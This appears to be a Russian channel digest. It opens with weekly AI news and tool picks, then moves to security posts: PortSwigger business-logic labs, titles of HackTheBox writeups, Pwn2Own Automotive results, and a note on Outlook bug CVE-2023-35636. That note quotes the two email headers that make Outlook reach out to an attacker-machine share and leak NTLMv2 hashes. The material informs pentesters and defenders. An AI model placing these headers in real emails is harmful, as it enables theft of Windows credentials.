🤖 Итоги недели в мире ИИ и обзоры новых сервисов

Мы написали статью на VC, которая основана на очередном выпуске нашей рассылки про последние новости и тенденции в мире ИИ. Залетайте и читайте!

👇Ниже — мини-подборка из статьи 👇

📰 Новости

▫️ OpenAI объявила о запуске долгожданного магазина кастомных чат-ботов.
▫️ В Пасадене (штат Калифорния) открывается первая закусочная CaliExpress by Flippy, полностью управляемая ИИ.
▫️ NVIDIA выпустила модель для распознавания речи Parakeet, которая по всем показателям превосходит OpenAI Whisper.
▫️ Использование ИИ в совместном научном проекте Microsoft и Тихоокеанской северо-западной национальной лаборатории в течение недели помогло определить новый элемент, который поможет снизить на 70% использование лития в батареях. Без ИИ такое исследование заняло бы по меньшей мере 20 лет.
▫️ Компания ByteDance выпустила новую модель MagicVideo-V2 для генерации видео.

🛠 Инструменты

◾️ Auto Wiki — генерирует вики-документацию для GitHub репозиториев.
◾️ Code to Flow — визуализирует, анализирует и объясняет код, написанный на всех популярных языках и фреймворках.
◾️ Concepto — платформа для создания прототипов веб-приложений.
◾️ Afforai — выполняет суммаризацию, перевод и поиск по множеству документов.
◾️ Corgea — исправляет уязвимые фрагменты кода.
◾️ Jan — опенсорсный оффлайновый чат-бот.
◾️ Plus AI — плагин для Google Slides: делает профессиональные презентации, персональные и командные дашборды, любые отчеты.

🤙 Сделай сам

🔸 WikiChat — опенсорсный инструмент для коррекции галлюцинаций с помощью информации из Википедии.
🔸 Подробная шпаргалка и советы по созданию продвинутых RAG.
🔸 OpenVoice — опенсорный инструмент для мгновенного клонирования голоса.

🎓 Туториалы

🔹 Туториал по работе с новым API Query Pipelines показывает примеры создания простых линейных цепочек и сложных ациклических графов из модулей LlamaIndex.
🔹 Туториал по объединению LLM с помощью mergekit детально разбирает 4 основных метода объединения моделей.

#чтопроисходит

😎Мы уже рассказывали, что ошибки в бизнес-логике приложений иногда встречаются чаще, чем традиционные баги. Поэтому их надо уметь искать и эксплуатировать!

📌 Ловите теоретический и практический гайд от PortSwigger, из которого вы получите базовые навыки. Ниже — только некоторые из примеров лабораторий:

• Excessive trust in client-side controls
• Failing to handle unconventional input
• Making flawed assumptions about user behavior
• Domain-specific flaws
• Providing an encryption oracle

#bugbounty #pentest #practice

🤯 Подборка свежих райтапов с площадки HackTheBox:

📦 HTB Sandworm: выходим из песочницы Firejail и повышаем привилегии в Linux
📦 HTB Pilgrimage: повышаем привилегии через уязвимость в Binwalk
📦 HTB Cybermonday: эксплуатируем путаницу ключей JWT
📦 HTB Authority: повышаем привилегии в Windows через ESC1 и Pass the Cert
📦 HTB Coder: реверсим шифровальщик и применяем технику ESC5
📦 HTB Sau: раскручиваем цепочку SSRF и инъекций команд до захвата веб-сервера
📦 HTB Zipping: используем инъекцию нулевого байта в ZIP-архиве, чтобы загрузить шелл
📦 HTB Bookworm: эксплуатируем сложную XSS с байпасом CSP
🔍 Лабы по форензике: Knock Knock и Tick Tock

#writeup #pentest

🚗 Подведены итоги трёх дней соревнований Pwn2Own Automotive, проходивших на конференции Automotive World в Токио.

📌 На соревнованиях были продемонстрированы 49 0-day в автомобильных информационно-развлекательных платформах, ОС и устройствах зарядки электромобилей. Немного деталей об атаках, которые показали исследователи:

• Два взлома окружения на базе дистрибутива Automotive Grade Linux ($47500, $35000)
• Взлом информационно-развлекательной системы автомобиля Tesla
• Взлом модема, используемого в автомобиле Tesla
• Пять взломов информационно-развлекательной системы на базе платформы Sony XAV-AX5500
• Взлом информационно-развлекательной системы на базе платформы Pioneer DMH-WT7600NEX
• Шесть взломов информационно-развлекательной системы на базе платформы Alpine Halo9 iLX-F509
• Два взлома зарядной станции Ubiquiti Connect EV Station
• Три взлома зарядной станции Phoenix Contact CHARX SEC-3100
• Взлом зарядной станции EMPORIA EV Charger Level 2
• Четыре взлома зарядной станции JuiceBox 40 Smart EV
• Семь взломов домашней зарядной станции ChargePoint Home Flex, позволивших выполнить код на уровне прошивки устройства
• Три взлома зарядной станции Autel MaxiCharger AC Wallbox Commercial

👉 Источник

#hackevent

😂 CVE-2023-35636

Команда Varonis обнаружила новую багу в функции обмена календарями в Microsoft Outlook, при котором добавление двух заголовков в электронное письмо заставляет Outlook делиться контентом и связываться с указанной машиной, создавая возможность перехвата хэша NTLM v2.

К слову, это новый способ получения NTLM-хэшей среди двух других новых способов: с помощью Windows Performance Analyzer и проводника Windows.

Для тех, кто не знает, NTLM v2 — это криптографический протокол, используемый Windows для аутентификации пользователей на удаленных серверах. Хотя NTLM v2 является более безопасной версией оригинального NTLM, v2 все еще уязвим для атак методом брутфорса и не только.

📌 Те самые заголовки Outlook:

"Content-Class" = "Sharing"
"x-sharing-config-url" = \\(Attacker machine)\a.ics

#pentest #CVE

📦 Невероятно крутые и доступные в понимании (особенно если смотреть после прочтения райтапа) видеоразборы заданий с HackTheBox от архитектора лабораторий.

Вот, например, разбор SSTI в приложении на Flask, взлом PyJWT и реверс/брутфорс TOPT Browser Plugin Export.

📺 Смотреть плейлист

#ctf #pentest #practice